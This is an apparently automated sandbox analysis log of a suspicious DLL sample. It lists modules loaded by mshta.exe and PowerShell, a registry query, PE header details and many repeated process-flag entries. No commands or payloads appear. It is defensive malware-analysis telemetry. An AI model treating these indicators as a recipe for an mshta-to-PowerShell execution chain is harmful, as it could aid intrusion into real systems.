Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: pcacli.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: UPazTgVGA7.dllStatic PE information: Image base 0x2b1b80000 > 0x60000000
Source: UPazTgVGA7.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: UPazTgVGA7.dllStatic PE information: section name: .xdata
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
